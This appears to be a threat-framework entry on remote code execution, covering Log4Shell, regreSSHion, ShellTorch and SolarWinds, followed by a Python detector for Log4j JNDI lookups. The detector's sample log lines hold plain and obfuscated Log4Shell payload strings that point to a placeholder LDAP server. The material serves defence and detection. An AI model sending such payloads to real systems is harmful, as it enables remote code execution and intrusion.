Remote Code Execution Exploitation
Info
ID: AT-PE002
Tactic: Payload Execution
Sub-techniques: Dynamic Code Evaluation, Insecure Deserialization Exploitation, Memory Buffer Overflow, Memory Pointer Manipulation
Remote Code Execution (RCE) Exploitation refers to adversaries identifying and leveraging application vulnerabilities that allow them to execute arbitrary code within the target's runtime environment. Common entry points for RCE include memory corruption flaws (e.g., buffer overflows or pointer manipulation), insecure deserialization routines, or unsafe dynamic code evaluation methods. Once triggered, RCE grants attackers direct control over backend processes, enabling them to deploy malware, escalate privileges, or pivot to other services.
Cloud-native applications with microservices, serverless components, or extensive third-party dependencies can inadvertently introduce more RCE opportunities. For instance, libraries that parse untrusted data or frameworks that dynamically compile templates can contain logic gaps if not carefully sandboxed. Unlike higher-level injection attacks, RCE vulnerabilities give adversaries immediate operational control of the application's own execution flow, posing a critical risk to both availability and data integrity.
Examples in the Wild
Notable Remote Code Execution Exploits and Their Impact:
Log4Shell (CVE-2021-44228)
The Log4Shell vulnerability in Apache Log4j allowed attackers to achieve remote code execution by sending specially crafted strings that would be logged by vulnerable applications. When Log4j processed these strings, it would make JNDI LDAP/RMI requests to attacker-controlled servers that could respond with malicious Java code to be executed. This vulnerability affected millions of Java applications and services worldwide, including Apple iCloud, Amazon Web Services, Cisco, IBM, Microsoft, and Twitter.
regreSSHion (CVE-2024-6387, CVE-2024-6409)
The regreSSHion attack exploited a critical regression vulnerability in OpenSSH that reintroduced a previously patched race condition from 2006. This vulnerability enabled unauthenticated remote code execution as root on glibc-based Linux systems through a signal handler race condition in sshd. Over 14 million potentially vulnerable OpenSSH instances were exposed to the internet, with 700,000 vulnerable instances identified in the Qualys customer base alone.
ShellTorch (CVE-2023-43654)
The ShellTorch attack demonstrated a sophisticated RCE chain targeting AI infrastructure through PyTorch's TorchServe framework. By combining SSRF and unsafe YAML deserialization vulnerabilities, attackers could achieve remote code execution on model serving infrastructure. This affected major organizations including Google Cloud AI Platform, Amazon SageMaker, Microsoft Azure ML, and Tesla AI Infrastructure.
SolarWinds SUNBURST
The SolarWinds supply chain attack achieved RCE through a compromised software update mechanism. The SUNBURST backdoor enabled remote code execution within compromised environments by executing arbitrary commands received through its command and control channel, all while operating within the trusted SolarWinds process space.
Attack Mechanism
Common RCE Exploitation Techniques:
- Protocol-Level Exploitation
  - JNDI injection through Log4j (Log4Shell)
  - SMB protocol exploitation (WannaCry)
  - SSH signal handler race conditions (regreSSHion)
- Deserialization Vulnerabilities
  - YAML deserialization in TorchServe (ShellTorch)
  - Java object deserialization
  - XML external entity processing
- Supply Chain Compromises
  - Backdoored software updates (SolarWinds)
  - Compromised build processes
  - Malicious dependency injection
- Memory Corruption
  - Buffer overflows in system services
  - Use-after-free vulnerabilities
  - Type confusion exploits
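The JNDI-injection entry above and the Log4Shell example earlier describe strings that Log4j resolves as lookups before they ever reach a log file. The following detector, an added example that is not part of this page or of any Log4j tooling, shows why a log scanner has to normalise nested lookups before searching for the jndi: lookup; the log lines, hosts and function names are constructed for illustration.

```python
import re

# Log4j 2 resolves nested lookups innermost-first before it evaluates the
# outer jndi: lookup, so a scanner that only greps for the literal "${jndi:"
# misses strings that assemble it from pieces. Collapse the lookup forms
# that reduce to plain text first, then search the normalised result.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")  # ${name:-default}
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _apply_case(m):
    text = m.group(2)
    return text.lower() if m.group(1).lower() == "lower" else text.upper()


def normalize_lookups(s, max_rounds=16):
    """Collapse nested lower/upper/default lookups until the text is stable."""
    for _ in range(max_rounds):
        collapsed = _DEFAULT_LOOKUP.sub(
            lambda m: m.group(1), _CASE_LOOKUP.sub(_apply_case, s))
        if collapsed == s:
            break
        s = collapsed
    return s


def is_jndi_lookup(s):
    """True if the string resolves to a JNDI lookup after normalisation."""
    return _JNDI_LOOKUP.search(normalize_lookups(s)) is not None


def scan_log_lines(lines):
    """Return (line_no, normalised_line) for each line carrying a JNDI lookup."""
    return [(i, normalize_lookups(line))
            for i, line in enumerate(lines, 1) if is_jndi_lookup(line)]


# Constructed sample web-server log lines; the host is a documentation address.
SAMPLE_LOG = [
    'GET /index.html "Mozilla/5.0" 200',
    'GET /api/items?id=42 "${jndi:ldap://203.0.113.10:1389/a}" 200',
    'GET /login "${${lower:J}ndi:${::-l}dap://203.0.113.10:1389/a}" 200',
    'GET /status "${date:yyyy-MM-dd}" 200',
]

if __name__ == "__main__":
    for line_no, text in scan_log_lines(SAMPLE_LOG):
        print(f"line {line_no}: {text}")
```

A benign date lookup on the last sample line is left alone, while the nested form on the third line collapses to the same jndi: lookup as the plain one and is reported alongside it.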